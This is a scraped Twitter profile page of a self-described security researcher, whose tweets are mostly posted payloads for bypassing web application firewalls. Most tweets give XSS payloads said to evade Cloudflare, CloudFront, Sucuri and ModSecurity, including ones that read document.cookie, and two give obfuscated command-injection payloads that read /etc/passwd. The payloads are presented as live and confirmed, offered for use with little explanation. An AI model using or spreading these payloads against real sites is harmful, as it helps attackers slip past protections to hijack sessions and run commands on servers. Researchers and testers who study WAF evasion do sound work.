/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍 台風

@spyerror

security research, write-ups & cybsec specialist

&& = %26%26
Vrijeme pridruživanja: travanj 2018.

Tweetovi

Blokirali ste korisnika/cu @spyerror

Jeste li sigurni da želite vidjeti te tweetove? Time nećete deblokirati korisnika/cu @spyerror

  1. Prikvačeni tweet

    I'm not lazy, I'm just one enegy saving mode.

    Poništi
  2. »_ everything is not as it seems. 🎃 «input»; p=-alert(1)}//\ * var n = {a: "-alert(1)}//\", b: "-alert(1)}//\"}; «input»; p=\&q=-alert(1)// * var n = {a: "\", b: "-alert(1)}//"};

    Poništi
  3. I made another personal tool for scanning $"commoncrawl" indexes and fetch related urls, which can be found on.

    Poništi
  4. Cloudflare {XSS} «byPass detection» `payload´; %3Cimg src='null' onerror=alert('spyerror')%3E 🏆

    Poništi
  5. proslijedio/la je Tweet
    3. stu 2019.

    Cloudflare bypass payloads by <img%20id=%26%23x101;%20src=x%20onerror=%26%23x101;;alert`1`;> <svg%0Aonauxclick=0;[1].some(confirm)//

    Poništi
  6. cloudflare {`XSS´} «byPASS» payloads. 🎯 🥇 /<img%20id=%26%23x101;%20src=x%20onerror=%26%23x101;;alert`1`;> 🥈 /<svg%0Aonauxclick=0;[1].some(confirm)//

    Poništi
  7. cloudflare `XSS´ success, red dot. 🎃 « <svg onload\r\n=$.globalEval("al"+"ert()");> » « <svg/onload=self[`aler`%2b`t`]`1`> »

    Poništi
  8. 🛡 « \%3C/onscroll/=1(_=prompt,_(String.fromCharCode(88,83,83,32,66,121,32,77,111,114,112,104,105,110,101)))%3E Try this one. ⛑ dot shot. 💣 »

    Prikaži ovu nit
    Poništi
  9. cloudflare «XSS» payload to bypass protection. 🦍 {` <body \< onscroll =1(_=prompt,_(String.fromCharCode(88,83,83,32,66,121,32,77,111,114,112,104,105,110,101)))> ´}

    Prikaži ovu nit
    Poništi
  10. CloudFront ~`XSS´ payload, shake dice. 🎲 <iframe srcdoc=<svg/o&#x6Eload&equals;alert&lpar;1)&gt;>

    Poništi
  11. Sucuri >_`xss´ payload, dot antidote. 🎓 $ "><svg/onload={-+-+-+-+-+-+-+-+-[alert`1`]}>

    Poništi
  12. ModSecurity { XSS } Detection Bypass; 🔐 { 1 }; <img src=x:alert(alt) onerror=eval(src) alt='spyerror'> { 2 }; "></tag><svg onload=alert(spyerror)>

    Poništi
  13. CloudFlare {"HTML TO XSS"}; ~byPass Detected. 📡 [" <style> z{</style><div style=animation-name:z onanimationend=&#97&#108&#101&#114&#116&grave;1&grave;> %253Cscript%253Ealert('XSS')%253C%252Fscript%253E "</script> "]

    Poništi
  14. Sucuri {` XSS ´}; payloads `appeared fresh, confirmed.´ ↭ Active </1>; "><BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")> Active </2>; <;br size=\";&;{alert(&#039;XSS&#039;)}\";>;

    Poništi
  15. ModSecurity {" XSS "} ~Bypass braindeath; ⓾ ~1; " %3Cspyerror%20script%20goes%20here%3E=%0AByPass " ~2; "%3Cscript%3Ealert(document.cookie)%3C/script%20ByPass%3E"

    Poništi
  16. {XSS}; CloudFront Bypass, dot shot. ✴️ ~/1~ <iframe/onload='this["src"]="jav"+"as&Tab;cr"+"ipt:al"+"er"+"t()"';> ~/2~ <svg/onload=location=`javas`+`cript:ale`+`rt%2`+`81%2`+`9`;//

    Poništi
  17. "Cloudflare"; live payloads: 🧠 ~1: &lt;img longdesc="src='x'onerror=alert(document.domain);//&gt;&lt;img " src='showme'&gt; ~2: &lt;img longdesc="src=" images="" stop.png"="" onerror="alert(document.domain);//&amp;quot;" src="x" alt="showme"&gt;

    Poništi
  18. Sucuri { RCE }; payloads, dot shot. 🌪️ Smuggling RCE Payloads: </> /???/??t+/???/??ss?? </> Obfuscating RCE Payloads: </> ;+cat+/e'tc/pass'wd </> </> c\\a\\t+/et\\c/pas\\swd </>

    Poništi
  19. ModSecurity { RCE } Detection Bypass 💥 { 1 }; ;+$u+cat+/etc$u/passwd$u { 2 }; ;+$u+cat+/etc$u/passwd+\#

    Poništi
  20. </>Cloudflare skip filters, ~XSS Bypass via dot. <div style="background:url(/f#&#127;oo/;color:red/*/foo.jpg);">X

    Poništi

Čini se da učitavanje traje već neko vrijeme.

Twitter je možda preopterećen ili ima kratkotrajnih poteškoća u radu. Pokušajte ponovno ili potražite dodatne informacije u odjeljku Status Twittera.

    Možda bi vam se svidjelo i ovo:

    ·